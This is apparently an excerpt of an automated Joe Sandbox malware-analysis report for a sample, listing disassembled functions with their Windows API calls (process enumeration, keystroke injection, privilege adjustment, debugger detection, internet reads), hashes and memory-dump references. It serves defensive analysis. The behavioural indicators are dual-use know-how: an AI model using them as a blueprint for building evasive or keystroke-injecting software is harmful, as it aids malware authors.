Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: lstrlen
String ID: ($tb($|
API String ID: 1659193697-4269497803
Opcode ID: d3c4bdfffb3583820ee99d5cca0c8823dc35b2a4ea58b97dc2096245d7a6576a
Instruction ID: ef1e7fbc248f29ebd2a131cda11426da263c28d648daa3716dfe91f1d672b909
Opcode Fuzzy Hash: d3c4bdfffb3583820ee99d5cca0c8823dc35b2a4ea58b97dc2096245d7a6576a
Instruction Fuzzy Hash: F8324674A11616AFC728CF59D080A6AB7F0FF48710B15C5AEE49ADB3A1EB70E951CB40

Function 0024A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0024A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0024A6BA

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0024A79C
CloseHandle.KERNEL32(00000000), ref: 0024A7AB

Part of subcall function 001DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00203303,?), ref: 001DCE8A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 9c4ecd3a8e95cf23f0cf6c67483de61effc4214114a1137c5729543b33326a3d
Instruction ID: 4080ad09220ae12587a77339c3f05ef8f1f75f0694eb140a992394ff4f1ec0ae
Opcode Fuzzy Hash: 9c4ecd3a8e95cf23f0cf6c67483de61effc4214114a1137c5729543b33326a3d
Instruction Fuzzy Hash: C4516B71508300AFD714EF24D886E6BBBE8FFA9754F40891DF58A97291EB30D904CB92

Function 0022AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0022AAAC
SetKeyboardState.USER32(00000080), ref: 0022AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0022AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0022AB88

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 944eec57c815033cf769c9c27211e683c296e7bfd1bc91a1faa09841c116acd6
Instruction ID: 1f03c2e4478b34a8f89355527c152836a29daccb7199331301a580d1210e7446
Opcode Fuzzy Hash: 944eec57c815033cf769c9c27211e683c296e7bfd1bc91a1faa09841c116acd6
Instruction Fuzzy Hash: E3312C30A60329BFFB358FE4AC09BFA77A6AF54314F14421AF081565D0D37489A1CB52

Function 001FBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001FBB7F

Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0

GetTimeZoneInformation.KERNEL32 ref: 001FBB91
WideCharToMultiByte.KERNEL32(00000000,?,0029121C,000000FF,?,0000003F,?,?), ref: 001FBC09
WideCharToMultiByte.KERNEL32(00000000,?,00291270,000000FF,?,0000003F,?,?,?,0029121C,000000FF,?,0000003F,?,?), ref: 001FBC36

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: 997dbdb421df44c7fdaabd3383157d3d1302250b5024a1a50fcc50b23eb5699a
Instruction ID: 198338a93ffac6d4fedbff37d19f8ebb4e2860dcc156a6ba2cad614a0df77aad
Opcode Fuzzy Hash: 997dbdb421df44c7fdaabd3383157d3d1302250b5024a1a50fcc50b23eb5699a
Instruction Fuzzy Hash: 5131B070D0821ADFCB15EF6AECC083ABBB8FF5675071442AAE664DB2A1D7309D10CB50

Function 0023CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0023CE89
GetLastError.KERNEL32(?,00000000), ref: 0023CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0023CEFE

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 84801bac9b08f9329087fdb549163b2b07ff2e225dc8c67d40250aef066b3214
Instruction ID: 9e2085cbacd4f48b79a98ea639ad8d3ae9480f93341a7d4561aa16b770064bf7
Opcode Fuzzy Hash: 84801bac9b08f9329087fdb549163b2b07ff2e225dc8c67d40250aef066b3214
Instruction Fuzzy Hash: 9B21EDB1510706AFD720DF65D948BAAB7FCEB10714F20442EE642E2151E770EE148B54

Function 00235C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00235CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00235D17
FindClose.KERNEL32(?), ref: 00235D5F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: a9c4956120f6f9cd84d6f1fdb2aba50fb07167ad5f0e339a3f0b1bc260603551
Instruction ID: fa18071fd99f9da118ed18f95c6b4c613ae04d045661a04044c396a8c12400f7
Opcode Fuzzy Hash: a9c4956120f6f9cd84d6f1fdb2aba50fb07167ad5f0e339a3f0b1bc260603551
Instruction Fuzzy Hash: F65198B4614B069FC714CF28C484E9AB7E4FF09324F14855EE95A8B3A2DB30ED15CB91

Function 001F2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 001F271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001F2724
UnhandledExceptionFilter.KERNEL32(?), ref: 001F2731

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: caafcfb39c5c3f56742535502ddbcf191a6e15c2e3f42ed0b13abf8958b1e607
Instruction ID: 282e2c61b32384b49ad7f8bd679753a014565536890d64658a1c83b640c8f05d
Opcode Fuzzy Hash: caafcfb39c5c3f56742535502ddbcf191a6e15c2e3f42ed0b13abf8958b1e607
Instruction Fuzzy Hash: 4D31B47491132CABCB21DF65DC8979DB7B8AF18710F5042EAE81CA7261E7709F818F45

Function 002351CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002351DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00235238
SetErrorMode.KERNEL32(00000000), ref: 002352A1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: e89a86fda8d82a8f87b5824219f176a323c792cc2e7dbaa346f9e1f6fcbc0c83
Instruction ID: ee86cecb777782c89add43e9848405a910b76111f9c0d11322f66a64138b8ab7
Opcode Fuzzy Hash: e89a86fda8d82a8f87b5824219f176a323c792cc2e7dbaa346f9e1f6fcbc0c83
Instruction Fuzzy Hash: 05314D75A106189FDB00DF54D888EAEBBB4FF58314F148099E8099B352DB31E856CB90

Function 002216C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 001DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001E0668
Part of subcall function 001DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001E0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0022170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0022173A
GetLastError.KERNEL32 ref: 0022174A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 4dae11ac7c73622a15463043ab16e022e2cbbadd6154edc9a8a5739e72bcdf22
Instruction ID: 0f93bef3e01b8e9dd1ae98e0ae126bd7246ff927e3c82c1ad5ab1410c34d2a37
Opcode Fuzzy Hash: 4dae11ac7c73622a15463043ab16e022e2cbbadd6154edc9a8a5739e72bcdf22
Instruction Fuzzy Hash: CF1191B2424305BFD7189F94EC86E6BB7BDEB44725B20852EE05657281EB70BC518A24

Function 0022D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0022D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0022D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0022D650

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: d30de9bea053feb92deccc6267b264133a847c88dfafe50d6e2f7844cf575657
Instruction ID: 5ec7c91018c29e57db524546542d8701b3e52d5a2ae9425ac8c9a71c7ad67481
Opcode Fuzzy Hash: d30de9bea053feb92deccc6267b264133a847c88dfafe50d6e2f7844cf575657
Instruction Fuzzy Hash: FD113C75E05328BFDB108F95AC49FAFBBBCEB45B50F108155F918E7290D6704A058BA1

Function 00221663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0022168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002216A1
FreeSid.ADVAPI32(?), ref: 002216B1

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: f9a36f6c1fa8e8c2e649406b45bdfca0eca0d749c26d40630b39d384c20e9419
Instruction ID: 457c29720a79f1fae03e83258da9425cb160e22f73b989137d4e47eb9eee2442
Opcode Fuzzy Hash: f9a36f6c1fa8e8c2e649406b45bdfca0eca0d749c26d40630b39d384c20e9419
Instruction Fuzzy Hash: 6CF0F471950309FFDB00DFE4AC89EAEBBBCEB08605F504565E501E2181E774AA448A54

Function 001E4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(001F28E9,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002,00000000,?,001F28E9), ref: 001E4D09
TerminateProcess.KERNEL32(00000000,?,001E4CBE,001F28E9,002888B8,0000000C,001E4E15,001F28E9,00000002,00000000,?,001F28E9), ref: 001E4D10
ExitProcess.KERNEL32 ref: 001E4D22

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 6b698cbd7b561460564c29568d072524a14f6e83393bf73e49cdad1d49b25f18
Instruction ID: f0c3d72a471e72798cce305b59a975c9e244a378c00278cb9eb8a3c253a71cc6
Opcode Fuzzy Hash: 6b698cbd7b561460564c29568d072524a14f6e83393bf73e49cdad1d49b25f18
Instruction Fuzzy Hash: 13E09271000A88AFCB11AF95ED09A583B69FBA1792B208054FD198A222DB35DA42CA84

Function 0021D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0021D28C

Strings

X64, xrefs: 0021D2A8

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: e0e9afc5f790c3d4cfb79b0b9b31cf0e26d4fadb4c3f650d22a4f2e4642a3d37
Instruction ID: 0fc718bf4d594f84e1262e78868b227c12a64ee9284851a7a00f21e1284c34e0
Opcode Fuzzy Hash: e0e9afc5f790c3d4cfb79b0b9b31cf0e26d4fadb4c3f650d22a4f2e4642a3d37
Instruction Fuzzy Hash: FED0C9B481121DEECF94CB90EC88DDAB3BCBB14305F100152F506A2140DB7495488F10

Function 001ECAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: cf3a9b455bdf7f5f205878bbffb69fccbee93924de63c9f70a4ffd47935387c6
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: 21021D71E006599BDF18CFA9C8906AEFBF1FF48314F254169D919E7380D731A9428BD4

Function 001CCAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

p#), xrefs: 001CCF7F
Variable is not of type 'Object'., xrefs: 00210C40

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#)
API String ID: 0-325136193
Opcode ID: 0453f4d011798cbac27b1d55f1c6809a58db4b86de82848df0278597272f20a1
Instruction ID: a25a23856ed80882ebf974798ddfba1e28f665d16a895856b6f0484feafd5a7d
Opcode Fuzzy Hash: 0453f4d011798cbac27b1d55f1c6809a58db4b86de82848df0278597272f20a1
Instruction Fuzzy Hash: 6E3269709102199BCF14DF94D885FEDB7B5BF25304F14805DE80AAB292DB75EE86CBA0

Function 002368EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00236918
FindClose.KERNEL32(00000000), ref: 00236961

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 04f57249fe2b5cb079c40b8075e8a552a4722665f784063c48cb964ab1f51eeb
Instruction ID: bd67534e48e790f9e0f3eb1ee16333560d7d502ba48d4e7cdc258bf3e427c7c5
Opcode Fuzzy Hash: 04f57249fe2b5cb079c40b8075e8a552a4722665f784063c48cb964ab1f51eeb
Instruction Fuzzy Hash: 4411BE71614201AFC710CF29D489B26BBE4EF84328F14C69DE8698F6A2C730EC05CB90

Function 002337B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00244891,?,?,00000035,?), ref: 002337E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00244891,?,?,00000035,?), ref: 002337F4

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: fbe07195eec2c265e39d2fab589660bab12255bd2f5f0f6a8a7b269c7f5dc92f
Instruction ID: 14f2f20c52783703033d842159897e6036283b3f2dc77f02369a79238fac3827
Opcode Fuzzy Hash: fbe07195eec2c265e39d2fab589660bab12255bd2f5f0f6a8a7b269c7f5dc92f
Instruction Fuzzy Hash: 75F0E5B06143292AE72057669C4DFEB7AAEEFC4B61F000165F509D2691DA709A04C7B0

Function 0022B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0022B25D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0022B270

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 93d622b4995f109ae38b147009b0c65141de9a8db2561413c02e0c9f9438fd43
Instruction ID: 042176d458a4952f7fa36435756fd3737ee49c3be67aabc42ae692356dcd46b6
Opcode Fuzzy Hash: 93d622b4995f109ae38b147009b0c65141de9a8db2561413c02e0c9f9438fd43
Instruction Fuzzy Hash: BAF01D7181434EAFDB059FA0D805BEE7FB4FF08305F108009F955A5192D3798611DF94

Function 002210BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002211FC), ref: 002210D4
CloseHandle.KERNEL32(?,?,002211FC), ref: 002210E9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
